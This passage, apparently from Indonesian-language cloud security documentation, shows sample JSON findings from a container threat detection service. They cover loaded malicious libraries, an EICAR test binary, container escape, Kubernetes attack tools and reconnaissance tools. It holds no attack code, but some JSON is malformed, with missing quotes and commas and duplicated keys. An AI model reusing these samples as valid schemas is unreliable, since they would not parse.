            "nanos": 618571329
          }
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1105/"
      },
      "virustotalIndicatorQueryUri": [
        {
          "displayName": "VirusTotal IP Link",
          "url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"
        }
      ],
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T19:51:06.618571329Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
        }
      ],
      "relatedFindingUri": {}
    }
  }
}
  

Eksekusi: Menambahkan Library Berbahaya yang Dimuat

{
  "finding": {
    "access": {},
    "application": {},
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
    "category": "Execution: Added Malicious Library Loaded",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "containers": [
      {
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_URI",
        "imageId": "CONTAINER_IMAGE_ID"
      }
    ],
    "createTime": "2023-11-13T21:40:14.340Z",
    "database": {},
    "eventTime": "2023-11-13T21:40:14.209Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {
      "pods": [
        {
          "name": "CONTAINER_NAME",
          "ns": "default",
          "containers": [
                {
                  "name": "CONTAINER_NAME",
                  "uri": "CONTAINER_URI",
                  "imageId": CONTAINER_IMAGE_ID"
                }
          ]
        }
      ],
      "nodes": [
        {
          "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"
        }
      ]
    },
    "mitreAttack": {
      "primaryTactic": "COMMAND_AND_CONTROL",
      "primaryTechniques": [
        "INGRESS_TOOL_TRANSFER"
      ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
      {
        "binary": {
          "path": "\"/malicious_files/drop_mal_lib\"",
          "size": "5005064",
          "sha256": "fe2e70de9f77047d3bf5debe3135811300c9c69b937b7fd3e2ca8451a942d5fb",
          "hashedSize": "5005064",
          "partiallyHashed": false
        },
        "libraries": [
          {
            "path": "\"/tmp/added-malicious-library-299fd066380ce690-should-trigger\"",
            "size": "68",
            "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
            "hashedSize": "68",
            "partiallyHashed": false
          }
        ],
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        },
        "args": [
          "\"/malicious_files/drop_mal_lib\"",
          "\"/tmp/added-malicious-library-299fd066380ce690-should-trigger\""
        ],
        "argumentsTruncated": false,
        "envVariables": [
          {
            "name": "\"KUBERNETES_SERVICE_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT\"",
            "val": "\"tcp://10.108.174.129:443\""
          },
          {
            "name": "\"HOSTNAME\"",
            "val": "\"ktd-test-added-malicious-library\""
          },
          {
            "name": "\"HOME\"",
            "val": "\"/root\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
            "val": "\"10.108.174.129\""
          },
          {
            "name": "\"PATH\"",
            "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
            "val": "\"tcp\""
          },
          {
            "name": "\"DEBIAN_FRONTEND\"",
            "val": "\"noninteractive\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP\"",
            "val": "\"tcp://10.108.174.129:443\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_HOST\"",
            "val": "\"10.108.174.129\""
          },
          {
            "name": "\"PWD\"",
            "val": "\"/malicious_files\""
          }
        ],
        "pid": "8",
        "parentPid": "1"
      }
    ],
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "securityPosture": {},
    "severity": "CRITICAL",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "display_name": "CLUSTER_ID",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "ruleName": "added_malicious_library_loaded"
    },
    "detectionPriority": "CRITICAL",
    "affectedResources": [
      {
        "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
      }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_NUMBER",
          "timestamp": {
            "seconds": "1699911603",
            "nanos": 535268047
          }
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1105/"
      },
      "virustotalIndicatorQueryUri": [
        {
          "displayName": "VirusTotal IP Link",
          "url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"
        }
      ],
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T21:40:03.535268047Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
        }
      ],
      "relatedFindingUri": {}
    }
  }
}
  

Eksekusi: Biner Berbahaya Bawaan Dijalankan

{
  "finding": {
    "access": {},
    "application": {},
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
    "category": "Execution: Built in Malicious Binary Executed",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "containers": [
      {
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_URI",
        "imageId": "CONTAINER_IMAGE_ID"
      }
    ],
    "createTime": "2023-11-13T21:38:57.405Z",
    "database": {},
    "eventTime": "2023-11-13T21:38:57.250Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {
      "pods": [
        {
          "name": "CONTAINER_NAME",
          "ns": "default",
          "containers": [
                {
                  "name": "CONTAINER_NAME",
                  "uri": "CONTAINER_URI",
                  "imageId": CONTAINER_IMAGE_ID"
                }
          ]
        }
      ],
      "nodes": [
        {
          "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"
        }
      ]
    },
    "mitreAttack": {
      "primaryTactic": "EXECUTION",
      "primaryTechniques": [
        "NATIVE_API"
      ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
      {
        "binary": {
          "path": "\"/malicious_files/eicar_testing_file\"",
          "size": "68",
          "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
          "hashedSize": "68",
          "partiallyHashed": false
        },
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        },
        "args": [
          "\"/malicious_files/eicar_testing_file\"",
          "\"built-in-malicious-binary-818358caa95b6d42\""
        ],
        "argumentsTruncated": false,
        "envVariables": [
          {
            "name": "\"KUBERNETES_SERVICE_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT\"",
            "val": "\"tcp://10.77.124.129:443\""
          },
          {
            "name": "\"HOSTNAME\"",
            "val": "\"ktd-test-built-in-malicious-binary\""
          },
          {
            "name": "\"HOME\"",
            "val": "\"/root\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
            "val": "\"10.77.124.129\""
          },
          {
            "name": "\"PATH\"",
            "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
            "val": "\"tcp\""
          },
          {
            "name": "\"DEBIAN_FRONTEND\"",
            "val": "\"noninteractive\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP\"",
            "val": "\"tcp://10.77.124.129:443\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_HOST\"",
            "val": "\"10.77.124.129\""
          },
          {
            "name": "\"PWD\"",
            "val": "\"/malicious_files\""
          }
        ],
        "pid": "7",
        "parentPid": "1"
      }
    ],
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "securityPosture": {},
    "severity": "CRITICAL",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "display_name": "CLUSTER_ID",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "ruleName": "built_in_malicious_binary_executed"
    },
    "detectionPriority": "CRITICAL",
    "affectedResources": [
      {
        "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
      }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_NUMBER",
          "timestamp": {
            "seconds": "1699911519",
            "nanos": 603253608
          }
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1106/"
      },
      "virustotalIndicatorQueryUri": [
        {
          "displayName": "VirusTotal IP Link",
          "url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"
        }
      ],
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T21:38:39.603253608Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
        }
      ],
      "relatedFindingUri": {}
    }
  }
}
  

Eksekusi: Container Escape

{
  "finding": {
    "access": {},
    "application": {},
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "category": "Execution: Container Escape",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "containers": [
      {
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_IMAGE_URI",
        "imageId": "CONTAINER_IMAGE_ID",
        "createTime": "2024-06-17T18:50:13Z"
      }
    ],
    "createTime": "2024-10-21T19:08:35.255Z",
    "database": {},
    "eventTime": "2024-10-21T19:08:35.091Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {
      "pods": [
        {
          "name": "CONTAINER_NAME",
          "ns": "NAMESPACE",
          "containers": [
            {
              "name": "CONTAINER_NAME",
              "uri": "CONTAINER_IMAGE_URI",
              "imageId": "CONTAINER_IMAGE_ID",
              "createTime": "2024-06-17T18:50:13Z"
            }
          ]
        }
      ],
      "nodes": [
        {
          "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID"
        }
      ]
    },
    "logEntries": [
      {
        "cloudLoggingEntry": {
          "resourceContainer": "projects/PROJECT_NUMBER",
          "timestamp": "2024-10-21T19:07:41.503072537Z"
        }
      }
    ],
    "mitreAttack": {},
    "mute": "UNDEFINED",
    "muteInfo": {
      "staticMute": {
        "state": "UNDEFINED",
        "applyTime": "1970-01-01T00:00:00Z"
      }
    },
    "mitreAttack": {
      "primaryTactic": "PRIVILEGE_ESCALATION",
      "primaryTechniques": [
        "ESCAPE_TO_HOST"
      ]
    },
    "mute": "UNDEFINED",
    "muteInfo": {
      "staticMute": {
        "state": "UNDEFINED",
        "applyTime": "1970-01-01T00:00:00Z"
      }
    },
    "muteUpdateTime": "1970-01-01T00:00:00Z",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
      {
        "binary": {
          "path": "INTERPRETER",
          "size": "147176",
          "sha256": "INTERPRETER_SHA_256",
          "hashedSize": "147176",
          "partiallyHashed": false,
          "diskPath": {}
        },
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false,
          "diskPath": {}
        },
        "args": [
          "INTERPRETER",
          "ARG"
        ],
        "argumentsTruncated": false,
        "envVariables": [
          {
            "name": "\"KUBERNETES_SERVICE_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT\"",
            "val": "\"tcp://34.118.224.1:443\""
          },
          {
            "name": "\"HOSTNAME\"",
            "val": "\"ktd-test-container-escape-suspicious-tool-ba379a7c2168db11\""
          },
          {
            "name": "\"HOME\"",
            "val": "\"/root\""
          },
          {
            "name": "\"GPG_KEY\"",
            "val": "\"7169605F62C751356D054A26A821E680E5FA6305\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
            "val": "\"34.118.224.1\""
          },
          {
            "name": "\"PATH\"",
            "val": "\"/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
            "val": "\"tcp\""
          },
          {
            "name": "\"LANG\"",
            "val": "\"C.UTF-8\""
          },
          {
            "name": "\"PYTHON_VERSION\"",
            "val": "\"3.12.6\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP\"",
            "val": "\"tcp://34.118.224.1:443\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_HOST\"",
            "val": "\"34.118.224.1\""
          },
          {
            "name": "\"PWD\"",
            "val": "\"/\""
          }
        ],
        "pid": "9",
        "parentPid": "1"
      }
    ],
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "securityPosture": {},
    "severity": "CRITICAL",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "displayName": "CLUSTER_ID",
    "type": "google.container.Cluster",
    "cloudProvider": "GOOGLE_CLOUD_PLATFORM",
    "service": "container.googleapis.com",
    "location": "ZONE",
    "gcpMetadata": {
      "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",
      "projectDisplayName": "PROJECT_ID",
      "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",
      "parentDisplayName": "PROJECT_ID",
      "folders": [
        {
          "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",
          "resourceFolderDisplayName": "FOLDER_ID"
        }
      ],
      "organization": "organizations/ORGANIZATION_ID"
    },
    "resourcePath": {
      "nodes": [
        {
          "nodeType": "GCP_PROJECT",
          "id": "projects/PROJECT_ID",
          "displayName": "PROJECT_ID"
        },
        {
          "nodeType": "GCP_FOLDER",
          "id": "folders/FOLDER_NUMBER",
          "displayName": "FOLDER_ID"
        },
        {
          "nodeType": "GCP_ORGANIZATION",
          "id": "organizations/ORGANIZATION_ID"
        }
      ]
    },
    "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID"
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "ruleName": "ktd_container_escape"
    },
    "affectedResources": [
      {
        "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
      }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_NUMBER",
          "timestamp": {
            "seconds": "1729291973",
            "nanos": 687426149
          }
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1611/"
      },
      "virustotalIndicatorQueryUri": [
        {
          "displayName": "VirusTotal File Link",
          "url": "https://www.virustotal.com/gui/file/21225e29b4225a4eca16996445e243fdab8051a0ad4bc232b907ef5e9b67f66b/detection"
        }
      ],
      "relatedFindingUri": {}
    }
  },
}
    

Eksekusi: Eksekusi Alat Serangan Kubernetes

{
  "finding": {
    "access": {},
    "application": {},
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "category": "Execution: Kubernetes Attack Tool Execution",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "containers": [
      {
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_IMAGE_URI",
        "imageId": "CONTAINER_IMAGE_ID",
        "createTime": "1970-01-01T00:00:00Z"
      }
    ],
    "createTime": "2024-10-21T19:08:35.255Z",
    "database": {},
    "eventTime": "2024-10-21T19:08:35.091Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {
      "pods": [
        {
          "name": "CONTAINER_NAME",
          "ns": "NAMESPACE",
          "containers": [
            {
              "name": "CONTAINER_NAME",
              "uri": "CONTAINER_IMAGE_URI",
              "imageId": "CONTAINER_IMAGE_ID",
              "createTime": "1970-01-01T00:00:00Z"
            }
          ]
        }
      ],
      "nodes": [
        {
          "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID"
        }
      ]
    },
    "logEntries": [
      {
        "cloudLoggingEntry": {
          "resourceContainer": "projects/PROJECT_NUMBER",
          "timestamp": "2024-10-21T19:07:41.503072537Z"
        }
      }
    ],
    "mitreAttack": {
      "primaryTactic": "RESOURCE_DEVELOPMENT",
      "primaryTechniques": [
        "OBTAIN_CAPABILITIES"
      ]
    },
    "mute": "UNDEFINED",
    "muteInfo": {
      "staticMute": {
        "state": "UNDEFINED",
        "applyTime": "1970-01-01T00:00:00Z"
      }
    },
    "muteUpdateTime": "1970-01-01T00:00:00Z",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
      {
        "binary": {
          "path": "INTERPRETER",
          "size": "147176",
          "sha256": "INTERPRETER_SHA_256",
          "hashedSize": "147176",
          "partiallyHashed": false,
          "diskPath": {}
        },
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false,
          "diskPath": {}
        },
        "args": [
          "INTERPRETER",
          "ARG"
        ],
        "argumentsTruncated": false,
        "envVariables": [
          {
            "name": "\"KUBERNETES_SERVICE_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT\"",
            "val": "\"tcp://34.118.224.1:443\""
          },
          {
            "name": "\"HOSTNAME\"",
            "val": "\"ktd-test-kubernetes-attack-suspicious-tool-864dfecdc8d5f5d4\""
          },
          {
            "name": "\"HOME\"",
            "val": "\"/root\""
          },
          {
            "name": "\"GPG_KEY\"",
            "val": "\"7169605F62C751356D054A26A821E680E5FA6305\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
            "val": "\"34.118.224.1\""
          },
          {
            "name": "\"PATH\"",
            "val": "\"/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
            "val": "\"tcp\""
          },
          {
            "name": "\"LANG\"",
            "val": "\"C.UTF-8\""
          },
          {
            "name": "\"PYTHON_VERSION\"",
            "val": "\"3.12.6\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP\"",
            "val": "\"tcp://34.118.224.1:443\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_HOST\"",
            "val": "\"34.118.224.1\""
          },
          {
            "name": "\"PWD\"",
            "val": "\"/\""
          }
        ],
        "pid": "9",
        "parentPid": "1"
      }
    ],
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "securityPosture": {},
    "severity": "SEVERITY_UNSPECIFIED",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "displayName": "CLUSTER_ID",
    "type": "google.container.Cluster",
    "cloudProvider": "GOOGLE_CLOUD_PLATFORM",
    "service": "container.googleapis.com",
    "location": "ZONE",
    "gcpMetadata": {
      "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",
      "projectDisplayName": "PROJECT_ID",
      "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",
      "parentDisplayName": "PROJECT_ID",
      "folders": [
        {
          "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",
          "resourceFolderDisplayName": "FOLDER_ID"
        }
      ],
      "organization": "organizations/ORGANIZATION_ID"
    },
    "resourcePath": {
      "nodes": [
        {
          "nodeType": "GCP_PROJECT",
          "id": "projects/PROJECT_ID",
          "displayName": "PROJECT_ID"
        },
        {
          "nodeType": "GCP_FOLDER",
          "id": "folders/FOLDER_NUMBER",
          "displayName": "FOLDER_ID"
        },
        {
          "nodeType": "GCP_ORGANIZATION",
          "id": "organizations/ORGANIZATION_ID"
        }
      ]
    },
    "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID"
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "ruleName": "ktd_container_escape"
    },
    "affectedResources": [
      {
        "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
      }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_NUMBER",
          "timestamp": {
            "seconds": "1729291973",
            "nanos": 687426149
          }
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1588/002/"
      },
      "virustotalIndicatorQueryUri": [
        {
          "displayName": "VirusTotal File Link",
          "url": "https://www.virustotal.com/gui/file/21225e29b4225a4eca16996445e243fdab8051a0ad4bc232b907ef5e9b67f66b/detection"
        }
      ],
      "relatedFindingUri": {}
    }
  },
}
    

Eksekusi: Eksekusi Alat Pengintaian Lokal

{
  "finding": {
    "access": {},
    "application": {},
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "category": "Execution: Local Reconnaissance Tool Execution",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "containers": [
      {
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_IMAGE_URI",
        "imageId": "CONTAINER_IMAGE_ID",
        "createTime": "1970-01-01T00:00:00Z"
      }
    ],
    "createTime": "2024-10-21T19:08:35.255Z",
    "database": {},
    "eventTime": "2024-10-21T19:08:35.091Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {
      "pods": [
        {
          "name": "CONTAINER_NAME",
          "ns": "NAMESPACE",
          "containers": [
            {
              "name": "CONTAINER_NAME",
              "uri": "CONTAINER_IMAGE_URI",
              "imageId": "CONTAINER_IMAGE_ID",
              "createTime": "1970-01-01T00:00:00Z"
            }
          ]
        }
      ],
      "nodes": [
        {
          "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID"
        }
      ]
    },
    "logEntries": [
      {
        "cloudLoggingEntry": {
          "resourceContainer": "projects/PROJECT_NUMBER",
          "timestamp": "2024-10-21T19:07:41.503072537Z"
        }
      }
    ],
    "mitreAttack": {
      "primaryTactic": "RECONNAISSANCE",
      "primaryTechniques": [
        "ACTIVE_SCANNING"
      ]
    },
    "mute": "UNDEFINED",
    "muteInfo": {
      "staticMute": {
        "state": "UNDEFINED",
        "applyTime": "1970-01-01T00:00:00Z"
      }
    },
    "muteUpdateTime": "1970-01-01T00:00:00Z",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
      {
        "binary": {
          "path": "INTERPRETER",
          "size": "147176",
          "sha256": "INTERPRETER_SHA_256",
          "hashedSize": "147176",
          "partiallyHashed": false,
          "diskPath": {}
        },
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false,
          "diskPath": {}
        },
        "args": [
          "INTERPRETER",
          "ARG"
        ],
        "argumentsTruncated": false,
        "envVariables": [
          {
            "name": "\"KUBERNETES_SERVICE_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT\"",
            "val": "\"tcp://34.118.224.1:443\""
          },
          {
            "name": "\"HOSTNAME\"",
            "val": "\"ktd-test-local-reconn-suspicious-tool-90e2e63d67bbc483\""
          },
          {
            "name": "\"HOME\"",
            "val": "\"/root\""
          },
          {
            "name": "\"GPG_KEY\"",
            "val": "\"7169605F62C751356D054A26A821E680E5FA6305\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
            "val": "\"34.118.224.1\""
          },
          {
            "name": "\"PATH\"",
            "val": "\"/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
            "val": "\"tcp\""
          },
          {
            "name": "\"LANG\"",
            "val": "\"C.UTF-8\""
          },
          {
            "name": "\"PYTHON_VERSION\"",
            "val": "\"3.12.6\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP\"",
            "val": "\"tcp://34.118.224.1:443\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_HOST\"",
            "val": "\"34.118.224.1\""
          },
          {
            "name": "\"PWD\"",
            "val": "\"/\""
          }
        ],
        "pid": "9",
        "parentPid": "1"
      }
    ],
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "securityPosture": {},
    "severity": "SEVERITY_UNSPECIFIED",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "displayName": "CLUSTER_ID",
    "type": "google.container.Cluster",
    "cloudProvider": "GOOGLE_CLOUD_PLATFORM",
    "service": "container.googleapis.com",
    "location": "ZONE",
    "gcpMetadata": {
      "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",
      "projectDisplayName": "PROJECT_ID",
      "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",
